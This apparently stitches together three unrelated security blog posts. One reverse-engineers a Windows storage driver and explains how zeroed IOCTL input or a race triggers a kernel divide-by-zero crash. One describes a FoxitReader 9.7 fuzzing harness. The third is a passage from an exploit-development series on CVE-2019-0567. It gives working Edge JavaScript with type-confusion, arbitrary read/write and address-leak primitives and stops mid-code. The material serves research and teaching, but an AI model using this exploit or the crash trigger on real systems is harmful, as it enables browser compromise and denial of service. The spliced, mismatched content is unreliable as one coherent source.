In the device security properties we see that the “Everyone” group has read & write permissions, which means low-privileged users can obtain a handle to the device and use it to communicate with the driver.

Note that the driver and device names in these directories are set in the driver’s DriverEntry when Windows loads it: first the device is created using IoCreateDevice, usually followed by the creation of a symbolic link using IoCreateSymbolicLink to give user-land code access.

When a user-land process wants to communicate with a device driver, it will obtain a file handle to the device. In this case the code would look like:

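#include <windows.h>

#define USR_DEVICE_NAME L"\\\\.\\vstor2-mntapi20-shared"

// Opening the device invokes the driver's IRP_MJ_CREATE dispatch handler
HANDLE hDevice = CreateFileW(USR_DEVICE_NAME,
                             GENERIC_READ | GENERIC_WRITE,       // read & write access
                             FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL,                               // default security attributes
                             OPEN_EXISTING,                      // the device must already exist
                             0,                                  // no flags or attributes
                             NULL);                              // no template file
// On failure hDevice is INVALID_HANDLE_VALUE and GetLastError() gives the reason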

This code results in the driver’s IRP_MJ_CREATE dispatch handler being called. This dispatch handler is part of the DRIVER_OBJECT for the target driver, which is the first argument to the driver’s DriverEntry. This structure has a MajorFunction array whose entries can be set to function pointers that handle callbacks for various events (like the create handler being called when a process opens a handle to the device driver).

In the image above, we know that the first argument to DriverEntry for any driver is a pointer to the DRIVER_OBJECT structure. With this information, we can follow where this variable is used to find the code that sets the function pointers in the MajorFunction array.

We can find out which MajorFunction index maps to which IRP_MJ_xxx function by looking at sample code provided by Microsoft, specifically on line 284 here.

Since we now know which array index maps to which function, we rename the functions with meaningful names as shown in the image above (e.g. we rename entry 0xe to ioctl_handler, as it handles DeviceIoControl requests from processes).

The read & write callbacks are called when a process calls ReadFile or WriteFile on the device handle, there are other callbacks too which we won’t go through.
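When labelling the MajorFunction assignments in DriverEntry, it helps to have the index-to-name mapping at hand. The values below reproduce the IRP_MJ_* constants from the WDK’s wdm.h (0x00 up to IRP_MJ_MAXIMUM_FUNCTION, 0x1b) as a small portable C lookup table; the helper names irp_mj_name and irp_mj_index are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* IRP_MJ_* values as defined in wdm.h; the array index is the MajorFunction index. */
static const char *const irp_mj_names[] = {
    "IRP_MJ_CREATE",                   /* 0x00: CreateFile */
    "IRP_MJ_CREATE_NAMED_PIPE",        /* 0x01 */
    "IRP_MJ_CLOSE",                    /* 0x02 */
    "IRP_MJ_READ",                     /* 0x03: ReadFile */
    "IRP_MJ_WRITE",                    /* 0x04: WriteFile */
    "IRP_MJ_QUERY_INFORMATION",        /* 0x05 */
    "IRP_MJ_SET_INFORMATION",          /* 0x06 */
    "IRP_MJ_QUERY_EA",                 /* 0x07 */
    "IRP_MJ_SET_EA",                   /* 0x08 */
    "IRP_MJ_FLUSH_BUFFERS",            /* 0x09 */
    "IRP_MJ_QUERY_VOLUME_INFORMATION", /* 0x0a */
    "IRP_MJ_SET_VOLUME_INFORMATION",   /* 0x0b */
    "IRP_MJ_DIRECTORY_CONTROL",        /* 0x0c */
    "IRP_MJ_FILE_SYSTEM_CONTROL",      /* 0x0d */
    "IRP_MJ_DEVICE_CONTROL",           /* 0x0e: DeviceIoControl */
    "IRP_MJ_INTERNAL_DEVICE_CONTROL",  /* 0x0f */
    "IRP_MJ_SHUTDOWN",                 /* 0x10 */
    "IRP_MJ_LOCK_CONTROL",             /* 0x11 */
    "IRP_MJ_CLEANUP",                  /* 0x12 */
    "IRP_MJ_CREATE_MAILSLOT",          /* 0x13 */
    "IRP_MJ_QUERY_SECURITY",           /* 0x14 */
    "IRP_MJ_SET_SECURITY",             /* 0x15 */
    "IRP_MJ_POWER",                    /* 0x16 */
    "IRP_MJ_SYSTEM_CONTROL",           /* 0x17 */
    "IRP_MJ_DEVICE_CHANGE",            /* 0x18 */
    "IRP_MJ_QUERY_QUOTA",              /* 0x19 */
    "IRP_MJ_SET_QUOTA",                /* 0x1a */
    "IRP_MJ_PNP",                      /* 0x1b */
};

#define IRP_MJ_COUNT (sizeof irp_mj_names / sizeof irp_mj_names[0])
static_assert(IRP_MJ_COUNT == 0x1c, "one entry per index 0x00..0x1b");

/* Name for a MajorFunction index, or NULL if out of range. */
const char *irp_mj_name(size_t index)
{
    return index < IRP_MJ_COUNT ? irp_mj_names[index] : NULL;
}

/* Reverse lookup: index for a name, or -1 if unknown. */
int irp_mj_index(const char *name)
{
    for (size_t i = 0; i < IRP_MJ_COUNT; i++)
        if (strcmp(irp_mj_names[i], name) == 0)
            return (int)i;
    return -1;
}
```

For example, irp_mj_name(0x0e) returns "IRP_MJ_DEVICE_CONTROL", which matches the entry renamed to ioctl_handler above.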

To start with, let’s analyze the irp_mj_create handler and see what happens when we create a handle to this device driver.

By default, this is what we see:

Firstly, we can improve decompilation by setting the correct types for a1 and a2, which we know must conform to the DRIVER_DISPATCH specification.

Doing so results in the following:

There are a few things happening in this function. Two structures shown here that are usually important are:

  • DeviceExtension object in the DEVICE_OBJECT structure

  • FsContext object in the IRP->CurrentStackLocation->FileObject structure

The DeviceExtension is a driver-defined buffer that is allocated together with the device object (its size is passed to IoCreateDevice) and managed by the driver. It is reachable through the DEVICE_OBJECT structure, and is thus available to the driver in all DRIVER_DISPATCH callbacks. Drivers typically use this buffer to manage state, variables and other information they need to access from a variety of locations. For example, if a driver supports IOCTLs to Open, Read, Write or Close TCP connections, it may store its current state (e.g. whether the connection is open or closed) in the DeviceExtension buffer, and whenever the Close function is called, check that state to ensure the connection can be closed. Essentially, it’s just a buffer the driver uses to store and retrieve information across contexts and functions.

The FsContext structure is similar and can be used as an arbitrary buffer, the main difference is that the DEVICE_OBJECT structure is created by the driver during the IoCreateDevice call, which means the DeviceExtension buffer does not get torn down or re-created when a user process opens or closes a handle to the device, while the FsContext structure is associated with a FILE_OBJECT structure that is created when CreateFile is called, and destroyed when the handle is closed, meaning the FsContext buffer is per-handle.

From the decompiled code we see that a buffer of size 0x20 is allocated and set as the FsContext structure. We also see that its first 64 bits are set to v5, which corresponds to the DeviceExtension pointer, so we have already figured out that the FsContext struct contains a pointer to the DeviceExtension as its first element.

For example:

struct FsContext {
    PVOID pDevExt;
};

Figuring out the rest of the elements to the FsContext and DeviceExtension structures is a simple but sometimes tedious process of looking at all the DRIVER_DISPATCH functions for the driver (like the ioctl handler) and noting down what offsets are accessed in these structs and how they’re used (e.g. if offset 0x8 in the DeviceExtension is used in a KeAcquireSpinLockRaiseToDpc call, then we know that offset is a pointer to a KSPIN_LOCK object).

Taking the time to document the structures this way pays off: it helps greatly when trying to understand the decompilation, and with some effort we can transform the IRP_MJ_CREATE handler to look like the below:

When looking at the FsContext structure, for example, we can open IDA’s Local Types window and create it using C syntax, as I did below:

Note that until you figure out what each element is, you can define the elements as placeholder fields and rename/retype them as you go (as long as you know the size of the structure, which we get easily here from the 0x20 size argument to ExAllocatePoolWithTag).
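A minimal sketch of that starting point in C, assuming a 64-bit target (8-byte pointers): one known field, one placeholder array covering the rest of the 0x20 bytes, and compile-time checks that fail as soon as a renamed or retyped field shifts the layout. The placeholder name unk_08 is hypothetical, and PVOID is redefined here only so the block compiles without the Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef void *PVOID;    /* stand-in for the Windows typedef */

/* Per-handle context allocated in the IRP_MJ_CREATE handler (0x20 bytes). */
struct FsContext {
    PVOID   pDevExt;        /* +0x00: pointer to the DeviceExtension (known) */
    uint8_t unk_08[0x18];   /* +0x08: not yet identified, rename/retype later */
};

/* Break the build if the guessed layout drifts from the allocation size. */
static_assert(sizeof(struct FsContext) == 0x20, "FsContext must be 0x20 bytes");
static_assert(offsetof(struct FsContext, pDevExt) == 0x00, "pDevExt at +0x00");
static_assert(offsetof(struct FsContext, unk_08) == 0x08, "placeholder at +0x08");
```

As offsets are identified, unk_08 is split into typed fields, and the size check keeps the total at 0x20.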

Now that we’ve analyzed the IRP_MJ_CREATE handler and determined there’s nothing stopping us from creating a handle, we can look into how the driver handles Read, Write & DeviceIoControl requests from user processes.

In analyzing these handlers, we see heavy use of the FsContext and DeviceExtension buffers, including checks on whether their contents are initialized.

It turns out there are quite a few vulnerabilities in this driver that are reachable if you craft your input to hit their code paths. While I won’t go through all of them (some are still pending disclosure!), we will look at one of them, a simple user->kernel DoS.

In IOCTL 0x2A0014 we see the DeviceExtension buffer get memset to 0 to clear its contents:

This is followed by a memmove that copies 0x100 bytes from the user’s input buffer into the DeviceExtension buffer, meaning the bytes at those offsets are user controlled (I denote this with a _uc suffix on the variable name):

During this IOCTL, another field in the DeviceExtension also gets set (which seems to indicate that the DeviceExtension buffer has been initialized):

This is critical to triggering the bug (which we will see next).
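The IOCTL code 0x2A0014 is not an opaque number. Windows I/O control codes are built by the CTL_CODE macro from a device type (bits 31..16), required access (bits 15..14), function number (bits 13..2) and transfer method (bits 1..0). A portable C sketch that encodes and decodes with that same layout; the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Same bit layout as the WDK's CTL_CODE(DeviceType, Function, Method, Access). */
uint32_t ctl_code(uint32_t device_type, uint32_t function,
                  uint32_t method, uint32_t access)
{
    assert(device_type <= 0xFFFF && function <= 0xFFF);
    assert(method <= 3 && access <= 3);
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

struct ioctl_fields {
    uint32_t device_type;
    uint32_t access;      /* 0 = FILE_ANY_ACCESS, 1 = read, 2 = write */
    uint32_t function;
    uint32_t method;      /* 0 = METHOD_BUFFERED, 3 = METHOD_NEITHER */
};

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xFFF;
    f.method      = code & 0x3;
    return f;
}
```

Decoding 0x2A0014 gives device type 0x2A, function 0x5, FILE_ANY_ACCESS and METHOD_BUFFERED. The access bits being zero fits the observation that any process with a handle can send it, and METHOD_BUFFERED means the I/O manager hands the driver a system-space copy of the caller’s input buffer, which is what the memmove reads from.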

So, the actual bug doesn’t live in the IOCTL handlers, instead it lives in the IRP_MJ_READ and IRP_MJ_WRITE handlers (note that in this case the READ and WRITE handlers are the same function, they just check the provided IRP to determine if the operation is a READ or WRITE).

In this handler, we can see a check to determine if the DeviceExtension’s some_if_field has been initialized:

After clearing this condition, the bug can be seen in sub_12840 in the following condition statement:

Here I have marked the unkn13 variable in the DeviceExtension buffer with _uc, meaning it’s user controlled (in fact, it’s set during the memmove call we saw earlier).

From the decompilation we see that the code does a % operation on our user controllable value, this translates to a div instruction:

If you’re familiar with x86, you’ll know that a div instruction with a divisor of 0 raises a divide-by-zero exception. We can easily trigger this here by providing an input buffer filled with zeros when we call IOCTL 0x2A0014 to set the user-controllable contents of the DeviceExtension buffer, and then reaching this code by reading from or writing to the device handle with the ReadFile or WriteFile APIs.

In fact, there are multiple ways to trigger this. Because the DeviceExtension buffer is essentially a global buffer and no locking is used when reading this value, there are race conditions where one thread calls IOCTL 0x2A0014 while another calls the read or write handler, such that this div instruction may be hit right after the memset in IOCTL 0x2A0014 clears the DeviceExtension buffer to 0.

In fact, there are multiple locations in this driver where such race conditions would affect the code paths taken!
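For comparison, here is a minimal C sketch of how such a read/write path could avoid the divide error, assuming the divisor lives in a shared, DeviceExtension-like structure: read the user-controlled field once into a local, so a concurrent memset cannot change it between the check and the use, and reject zero before the %. The structure, field and function names are hypothetical, and this only removes the crash; keeping the rest of the shared state consistent would still need proper locking.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the shared DeviceExtension fields. */
struct dev_ext {
    volatile uint32_t initialized;   /* set by the IOCTL handler */
    volatile uint32_t unkn13_uc;     /* user controlled, copied in by memmove */
};

/* Stores position % divisor in *out and returns 0, or returns -1 if the
 * state is unusable. The analyzed driver performs the % without this check. */
int checked_offset(const struct dev_ext *ext, uint64_t position, uint64_t *out)
{
    assert(ext != NULL && out != NULL);
    if (!ext->initialized)
        return -1;
    /* Single fetch: the value that is checked is the value that is used. */
    uint32_t divisor = ext->unkn13_uc;
    if (divisor == 0)
        return -1;
    *out = position % divisor;
    return 0;
}
```

Re-reading ext->unkn13_uc for the division after checking it would reintroduce the race, since the memset could land between the two reads.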

Overall, this driver is a good target for reverse engineering practice with Kernel drivers due to its use of not only IOCTLs, but also read & write handlers + the use of the FsContext and DeviceExtension buffers that need to be reversed to understand what the driver is doing, and how we can influence it. All the bugs found in this driver were purely from static reverse engineering as a fun exercise.


Fuzzing FoxitReader 9.7’s ConvertToPDF

Inspiration to create a fuzzing harness for FoxitReader’s ConvertToPDF function (targeting version 9.7) came from discovering Richard Johnson’s fuzzer for a previous version of FoxitReader (found here: https://www.cnblogs.com/st404/p/9384704.html).

Multiple changes have since been introduced in the way FoxitReader converts an image to a PDF, including new vtable entries and the need to load the main FoxitReader.exe binary (including fixing its IAT and modifying data sections to contain valid handles to the current process heap), among others.

The source for my version of the fuzzing harness targeting version 9.7 can be found on my GitHub: https://github.com/Kharos102/FoxitFuzz9.7

Below is a quick walkthrough of the reversing and coding performed to get this harness working.

Firstly, based on the existing work from previous fuzzers, we know that most of the calls for converting an image to a PDF occur via vtable function calls on an object returned from ConvertToPDF_x86!CreateFXPDFConvertor. This could also be found manually by debugging the application, setting a breakpoint on file read accesses to the image we supply as a parameter to the conversion function, and then walking the call stack.

To start our harness, I decided to analyse how the actual FoxitReader.exe process sets up the objects required for the conversion function, by setting a breakpoint on the CreateFXPDFConvertor function.

Next, by stepping out and setting breakpoints on all the vtable function pointers of the returned object, we can discover the order in which these functions are called, along with their parameters; we need this to set up the object before calling the actual conversion routine.

Dumping the Object’s VTable

We can view the vtable because the pointer to it is the first 4 bytes (32-bit) of the object when we dump it.
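The layout relied on here is the usual one for C++ objects with virtual functions built by MSVC: the first pointer-sized field of the object is the vtable pointer (4 bytes in the 32-bit FoxitReader process, 8 bytes on a 64-bit host). A C sketch that models such an object by hand and reads the vtable pointer from offset 0 the way a debugger dump shows it; the struct names and the two vtable entries are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hand-built model of a C++ object with virtual functions. */
struct convertor;
struct convertor_vtbl {
    int  (*init)(struct convertor *self);
    void (*release)(struct convertor *self);
};

struct convertor {
    const struct convertor_vtbl *vtbl;   /* offset 0: vtable pointer */
    int state;
};

static_assert(offsetof(struct convertor, vtbl) == 0, "vtable pointer must be first");

/* Reads the first pointer-sized value of an object, i.e. what dumping the
 * object in a debugger shows as the vtable address. memcpy sidesteps
 * strict-aliasing problems with casting the object pointer. */
const void *read_vtable_ptr(const void *object)
{
    const void *vtbl;
    memcpy(&vtbl, object, sizeof vtbl);
    return vtbl;
}
```

Dumping the pointer-sized entries starting at that address then lists the virtual functions in slot order, which is where the breakpoints described above go.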

During this process we can notice multiple differences compared to older versions of FoxitReader, including changes to existing function prototypes and the introduction of new vtable functions that must be called.

After executing and noting the details of execution, we hit the main conversion function from the vtable of our object, here we can analyse the main parameter (some sort of conversion buffer structure) by viewing its memory and noting its contents.

First, we see that the initial 4 bytes are a pointer to an offset within the FoxitReader.exe image.

Buffer Structure Analysis

This means our harness will have to load the FoxitReader image in-memory to also supply a valid pointer (we also have to fix its IAT and modify the image too, as we discover after testing the harness).

Then we continue noting down the buffer’s contents, including the input file path at offset +0x1624, the output file path at offset +0x182c, and more (including a version string).
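A harness has to reproduce this buffer byte for byte. The C sketch below writes UTF-16 paths at the two offsets noted above into a raw buffer. The offsets come from the debugging session; everything else is an assumption: the helper name put_utf16_path is hypothetical, and the field width is inferred from the gap between the two offsets (0x208 bytes, i.e. 260 UTF-16 code units, the value of MAX_PATH), which suggests fixed-size path fields but is not confirmed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define INPUT_PATH_OFFSET   0x1624u  /* observed: input file path  */
#define OUTPUT_PATH_OFFSET  0x182cu  /* observed: output file path */
/* Assumed width of each path field: the gap between the two offsets. */
#define PATH_FIELD_BYTES    (OUTPUT_PATH_OFFSET - INPUT_PATH_OFFSET)

static_assert(PATH_FIELD_BYTES == 0x208, "260 UTF-16 code units");

/* Copies a NUL-terminated UTF-16 string into buf at offset, zero-filling the
 * rest of the assumed fixed-size field. Returns 0, or -1 if it does not fit.
 * memcpy keeps host byte order, which matches UTF-16LE on x86. */
int put_utf16_path(uint8_t *buf, size_t buf_len, size_t offset, const uint16_t *path)
{
    size_t units = 0;
    while (path[units] != 0)
        units++;
    size_t bytes = (units + 1) * sizeof(uint16_t);   /* include the terminator */
    if (bytes > PATH_FIELD_BYTES || offset + PATH_FIELD_BYTES > buf_len)
        return -1;
    memset(buf + offset, 0, PATH_FIELD_BYTES);
    memcpy(buf + offset, path, bytes);
    return 0;
}
```

The smallest buffer that holds both fields under this assumption is 0x182c + 0x208 = 0x1a34 bytes; the real structure may well be larger, so the harness should size it from what the debugger shows.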

Finally after the conversion the object is released and the buffer is freed.

After noting all the above we can make a harness from the information discovered and test.

During testing, certain issues were discovered and accounted for, including exceptions in the FoxitReader.exe image loaded into memory caused by its imports being used; this was fixed by fixing up the image’s IAT when it is loaded.

Additionally, calls to HeapAlloc were made with a heap handle read from an offset in the in-memory FoxitReader image, but that handle was uninitialised. This was fixed by writing the current process heap handle into the FoxitReader image at the offset the HeapAlloc caller reads it from.

Overall the process was not long and the resulting harness allows for fuzzing of the ConvertToPDF functionality in-memory for FoxitReader 9.7.

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

Introduction

In part one of this blog series on “modern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably “no child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the “closed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4-byte values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");
}
</script>

Nothing about this code differs in the slightest from our previous exploit.js code, except that we are now using an HTML file, as this is the type of file Edge, a web browser, expects. This also means we have replaced the print() calls with document.write() calls in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line so that our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us to choose when we want to detonate our exploit, which will aid us in debugging, as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per part two of this blog series): our exploit primitive leaks the vftable from one of our DataView objects, which is a pointer into chakra.dll. However, as we are now exploiting Edge itself and not the ChakraCore engine, the computation of chakra.dll’s base address will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address, so let’s talk about debugging Edge.
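The arithmetic itself is simple once that distance is known: the exploit leaks the vftable as two 32-bit halves, so they are recombined into a 64-bit pointer and the distance is subtracted. The C sketch below uses the 0x5d0bf8 offset measured later in this post for this unpatched build (it must be re-measured for any other build). Because Windows maps DLL images at 64 KB-aligned addresses, a correct base has its low 16 bits clear, which gives a cheap sanity check. The function names are hypothetical.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Distance from the leaked DataView vftable to chakra.dll's base on the
 * build used in this post; re-measure for any other build. */
#define CHAKRA_VFTABLE_OFFSET 0x5d0bf8ULL

/* Recombine the two 32-bit halves read through the DataView primitive. */
uint64_t join_halves(uint32_t hi, uint32_t lo)
{
    return ((uint64_t)hi << 32) | lo;
}

/* Computed chakra.dll base, or 0 if the result is not 64 KB aligned
 * (a sign the offset does not match this build). */
uint64_t chakra_base(uint32_t vtable_hi, uint32_t vtable_lo)
{
    uint64_t base = join_halves(vtable_hi, vtable_lo) - CHAKRA_VFTABLE_OFFSET;
    return (base & 0xFFFF) == 0 ? base : 0;
}

/* Format a 64-bit value with both halves zero-padded, e.g. "0x00007ffa00123456". */
void format_ptr(char out[19], uint64_t value)
{
    assert(out != NULL);
    snprintf(out, 19, "0x%016" PRIx64, value);
}
```

Fixed-width formatting matters because concatenating hex(vtableHigh) + hex(vtableLo), as the exploit’s output line does, silently drops leading zeros in the low half whenever it is below 0x10000000.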

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe implies, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the component of the browser that actually executes the JavaScript, HTML, and CSS code a user interacts with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of them hosts the content we are seeing (the exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, but the out-of-process JIT server we talked about previously in this blog series. What does this actually mean?

JIT’d code is code generated as readable, writable, and executable (RWX). This is also known as “dynamic code”: it is generated at runtime and doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level, ACG prohibits any dynamic code (amongst other nuances we will cover at the appropriate time) from being generated as readable, writable, and executable (RWX). Since ACG is a mitigation that was actually developed with browser exploitation and Edge in mind, this creates a usability issue: JIT’d code is a massive component of a modern-day browser, which automatically makes ACG incompatible with Edge. If ACG is enabled, how can JIT’d code be generated, given that it is RWX? The solution to this problem is an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reasoning is that the JIT process doesn’t execute any “untrusted” JavaScript code, meaning the JIT server supposedly can’t be exploited through browser exploitation primitives like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). Since the JIT process doesn’t execute any JavaScript, HTML, or CSS code from a web page, we can infer that the JIT server doesn’t handle any “untrusted code”, and therefore any code running within it is “trusted” code that doesn’t need “unnecessary constraints” placed on the process. With ACG not enabled in the out-of-process JIT server, the process is compatible with JIT and can generate the RWX code that JIT requires. The main issue, however, is how to get this code (which lives in a separate process) into the appropriate content process where it will actually be executed.

The way this works is that the out-of-process JIT server takes any JIT’d code that needs to be executed and injects it into the content processes that contain the JavaScript code to be executed, with ACG-compliant permissions (generally readable/executable). So, at a high level, the out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which have ACG enabled). This allows the Edge content processes, which handle untrusted code such as a web page hosting malicious JavaScript that performs memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the “main” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point is that when we debug our exploit, the content process is responsible for executing the JavaScript code within our web page, meaning it is the process we need to debug. However, since the out-of-process JIT server is also named like a content process, there are two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with close to 100% accuracy is by comparing the two MicrosoftEdgeCP.exe processes and determining which one uses more RAM. In my testing, the process using more RAM (significantly more) is the target process for debugging, which makes sense, as the content process has to load JavaScript, HTML, and CSS code into memory for execution. With that in mind, we can break down the process tree as follows (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our “exploiting process” we want to debug).

With this knowledge, we can attach WinDbg to PID 2512 (our content process; the PID will likely differ on your machine), knowing that this is the process responsible for executing our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we can click our Click me to exploit CVE-2019-0567 button (you may have to click it twice). This runs our exploit, and from here we can calculate the distance to chakra.dll in order to compute the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from the base of chakra.dll. We can then update our exploit script to the following code and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

